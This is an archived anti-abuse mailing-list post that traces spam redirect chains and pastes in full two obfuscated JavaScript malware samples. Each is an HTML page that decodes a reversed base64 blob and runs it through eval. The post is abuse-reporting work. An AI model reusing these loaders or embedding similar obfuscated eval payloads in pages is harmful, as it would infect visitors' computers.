This archive is retained to ensure existing URLs remain functional. It will not contain any emails sent to this mailing list after July 1, 2024. For all messages, including those sent before and after this date, please visit the new location of the archive at https://mailman.ripe.net/archives/list/[email protected]/
[anti-abuse-wg] Malware/ransomware current live distribution IPs

Previous message (by thread): [anti-abuse-wg] Malware/ransomware current live distribution IPs
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Ronald F. Guilmette rfg at tristatelogic.com
Thu Jun 30 23:45:00 CEST 2016
In message <15749.1467320923 at server1.tristatelogic.com>, I wrote:

>Anyway, following the link in the above spam payload/body gets you to
>a trivial redirector... kindly hosted by Godaddy... which then attempts
>to take you to this new URL:
>
>    http://gooodweightlossgood.com/?a=388338&c=wl_con&s=33
>
>There is another redirection once you get there.

The additional redirection takes you to:

   http://372-beauty.gooodweightlossgood.com/us/newd/scux/cla-safflower-oil/

Note however that the content being served up here is *only* an advert for
a useless diet supplement (CLA Safflower Oil)... *not* a hunk of Javascript
malware.

I have yet to figure this out exactly.  Some of the time, these sites
serve up unambiguous (and heavily encoded) Javascript malware.  (See
below.)  Other times, they don't.  I confess that I haven't figured
out the pattern yet, or even whether it is a time-dependent thing.


Regards,
rfg


malware sample 1:
==============================================================================
<!DOCTYPE html>
<html>
    <head>
        <script language="javascript" type="text/javascript">
            var _1Ol='==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';function _0l0(data){var OOIlOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw
 xyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=OOIlOI.indexOf(data.charAt(i++));h2=OOIlOI.indexOf(data.charAt(i++));h3=OOIlOI.indexOf(data.charAt(i++));h4=OOIlOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function OOI(string){ var ret = '', i = 0;	for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(_0l0(OOI(_1Ol)));        </script>
    </head>
    <body>
    </body>
</html>
==============================================================================


Malware sample 2:
==============================================================================
<!DOCTYPE html>
<html>
    <head>
        <script language="javascript" type="text/javascript">
            var I1O='KkSKpcCfngCdpxGcz5yJyFmd8NzMwATd8RzMwATd8VGchN2cl5Wd8Rnbl1Wdj9GZ8VGdpJ3d8J2NwATd8FmNwATd8xHfmRDMwUHfjNDMwUHfxIDMwUHf5cDMwUHf5IDMwUHf2IDMwUHfmNDMwUHfhNDMwUHf3cDMwUHf4cDMwUHfkZDMwUHfmVDMwUHf3IDMwUHfxMDMwUHfkJDMwUHf2cDMwUHf1QDMwUHf3YDMwUHfiNDMwUHf4IDMwUHflBXYjNXZfxHO2ADM1xnM2ADM1xHM3ADM1xHZ3ADM1xnMyADM1x3M2ADM1xnY2ADM1xnN2ADM1x3Y2ADM1xXN3ADM1xXOwADM1xXZyADM1xXZzADM1xnM3ADM1xXO2ADM1x3NyEDfyYDf1UDfxYDMwUHf0cDMwUHflZDMwUHf0YDMwUHfmJDMwUHfhBDMwUHfkNDMwUHfzcDMwUHfmZDMwUHfwIDMwUHf1YDMwUHfsFmdlxHdpxGczxHdulUZzJXYwxHc4V0ZlJFflR2bDJXYoNUbvJnZ8dmbpJHdT9Gd8dXZuxHfmlGfn5WayR3U8VGbph2d8V2YhxGclJHfu9Wa0Nmb1ZGfuJXd0Vmc8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8dCLxAjMsIjNscSKp03esADLpcCX8dCXoYmMucCXRJDfQJDfTJDfUJDfWJDfYJDfVJDfPJDfOJDfIJDfHJDfGJDfJJDfKJDfNJDfMJDfLJDfXJDf0MDflNDfiNDfhNDfjNDfkNDf5MDf3MDfwMDfaJDfZJDf4MDfxMDfyMDfzMDfSJDf4JDftJDfqJDf1MDf3IDflJDfn
 JDfkJDfsJDfjJDfmJDf1IDfhJDf4IDf2IDf5IDfiJDf2MDfoJDfpJDfrJDfEJDf5JDfuJDf6JDfBJDfDJDfCJDf3JDf2JDfxJDfwJDfFJDfvJDfyJDfzIDfzJDf0IDf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHfnwFL1JDL0JDLnwVKpkyJcxFX8dCXcxFKrFjLnwFXcdUM8ZUM8VUM8hUM8lUM8tUM8pUM8RUM81UM8dXM8ZXM8VXM8hXM8lXM8JUM8FUM8pXM8xUM8NVM8BjM8lVM8hVM8dVM8pVM8JjM8FjM8VVM8BVM89UM8ZVM85UM8FVM8JVM8RVM8NUM81WM8ZTM8VTM8RTM8dTM8hTM8FWM8lTM8NTM8RXM8JTM8hFfZx3V8pFfxEDfwEDfiFDfzFDfjFzJcxFXsUFLVxyJcxFX7kSKLhyToElLQtzJcxFXcxFXchUJzUCblQTJ5UyNlQWJmViSlEWJBVSYlEXJ6ViZlMXJ5USMlUWJ1UCMlkTJ4UiYlQTJyVyNlATJyVyMlATJ0ViNlQWJmViZlgXJsVyMlMTJyVielITJqViMlcWJwUSOlIXJlVSNlETJ0UyMlYTJ3USMlIWJlViQlETJ4USNlQTJCViMlITJyUiMlEWJDViMlATJkViYlATJyUSQlEWJxVielYWJzUyNlYTJ5UyMlkXJwUSdlUTJ0UiYlETJjVCZlkTJxUyZlUXJwUSOlgWJsViZlMXJ4UCMlkXJmVyYlQWJwUCOlYWJkVCalYWJ3VSMlcTJlVSNlETJ0UyMlETJ3VSOlgTJ5UCOlgTJ2UiYlMXJlVyMlATJ0UCOlUXJJVyUlIVJmViZlgXJsVyMlMTJyVielITJqViMlcWJwUSOlIXJlVSNlETJ0UyMlYTJ3USMlIWJlViQlETJ4USNlQTJCViMlITJyUiMlEWJDViMlsWJrVyblgTJwU
 iYl4WJ2USNlATJ2VCZlATJ0UyYlETJxUyNlYXJwUSOlYTJvViMlcWJ0USYlEUJhVSclsWJ4UCMlIWJuViNlUTJwVCMlQTJjVSMlETJ3UyblITJ1USOlgWJzUCMlkTJpVSYlEUJpVSYlEXJwUCZlIWJ2UyZlITJ4ViMlATJoVSOlMTJyUCRlITJrVSSlUXJyUialcUJyUyal0WJwUCNlMWJxUSMlcTJzUCZlATJzUSbl8WJnViTlkXJwUCOlUTJ0USZlATJ0UyYlETJxUyNlUWJzUSNlATJ3VCalcTJxUCOl8WJyUialITJ4UCMlIWJuViNlUTJwVCMlQTJjVSMlETJ3USalkWJhVScl0WJwUCNlMWJxUSMlcTJzUCZlATJzUSbloWJwUCNlMWJxUSMlcTJlVyMlUTJwUydlgWJ3USMlgTJpVSalEWJyUyQlkWJhVyalgTJwUiYl4WJ2USNlAXJwUCNlMWJxUSMlcTJHViMlUUJFViMl0WJ4UCMlUTJ0UyZlATJ4USNlgWJtViMloWJqViMlgTJwUiYl4WJ2USNlAXJwUCNlMWJxUSMlcTJlVSOlETJzUiNlMXJ0UCdlYTJ1UiMlcWJxUCMlwWJGVyMl8WJyUyZlQTJpVSYlEWJxVCMlQWJiViNlcWJyUCelITJwUCalkTJzUiMlQUJyUyalgTJwUiYl4WJ2USNlAXJwUCNlMWJxUSMlcTJlVSOlETJzUiNlMXJ0UCdlYTJ1UyblITJqViMlgTJwUiYl4WJ2USNlAXJwUCNlMWJxUSMlcTJyUSOlYTJ0VSalEWJDVSYlsWJvVCOlATJiViblYTJ1UCMlYXJkVCMlQTJjVSMlETJ3UidlATJ5UiNlITJ1USMlQTJzUyNlUTJoVyZlEWJIVSblMTJsVCNlkTJ3UCZlYTJ0ViNlwUJmVyMlkXJwUyMl0WJqVCMlwWJGVyMlITJzUCblQTJ5UyNlQWJKVyJcxFXcxFXc1zSg00JcxF
 Xo0HcgYVf9lSXjt1askyJcxFXndCXcxFLnwFXcJGXcxFXcxFXcdCXcx1KpMGKltyJcxFXixFXcxFXcxFXnwFXchibxASaxgiax4Cc9A3ep01YbtGKoFzep0SLjhyZxsTfpkCZxgSZx4yY6kiZxsyYowWMuEXM/IXM+kSYlMWPjhCKrkSKpE2LjhCcxgSZ6cCXcx1JcxFX/EGPjhiV7lyYoQVPltXKkxSZssGLjxSYsAHKUhybxcCXo0HcgMjM91XKdN2WrxSKnw1ZnwFLnwlYcxFXcdCXrkyYoU2KnwlYcxFXcdCXoQmMgEmMoUjMuAXPwtXKdN2WrhCOysXKt0yYoYjM70XM9M2O9dCXrcHXcxFXnw1MysXKoQjM9U2Od1XXltFZgMjM7lSZoQjMb1za9lyYoUGf811YbtWPdlyYoU2WktXKt0yYoYjM7lSK3IDLv41LoUjMucCXnwVIogjM70XKpYzMoImMuMmOpkjMrMGKjJjL3IzP1MjPpEWJj1zYogyKpkSKh9yYoUmMoUmOnw1Jc9TY8MGKzIzepMGK0ITPltXKkxSZssGLjxSYsAHK0IDKnJzJo0Hcg4mc1RXZy1Xfp01YbtGLpcyZnwyJixFXnsSKjhSZrciYcx1JoAHeFdWZSBydl5GKlNWYsBXZy5Cc9A3ep01YbtGKml2ep0SLjhSZslGa3tTfpkiNzgyZulmc0N1b05yY6kSOysyYoUGZvNkchh2Qt9mcm5yZulmc0N1P1MjPpEWJj1zYogyKpkSKh9yYoQnbJV2cyFGcoUmOncyPhxzYo4mc1RXZytXKjhibvlGdj5Wdm1TZ7lCZsUGLrxyYsEGLwhibvlGdj5WdmhCbhZXZ';function OlI(data){var _011lOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i
 =0,enc='';do{h1=_011lOI.indexOf(data.charAt(i++));h2=_011lOI.indexOf(data.charAt(i++));h3=_011lOI.indexOf(data.charAt(i++));h4=_011lOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function _011(string){ var ret = '', i = 0;	for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(OlI(_011(I1O)));        </script>
    </head>
    <body>
    </body>
</html>
==============================================================================
Previous message (by thread): [anti-abuse-wg] Malware/ransomware current live distribution IPs
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[ anti-abuse-wg Archives ]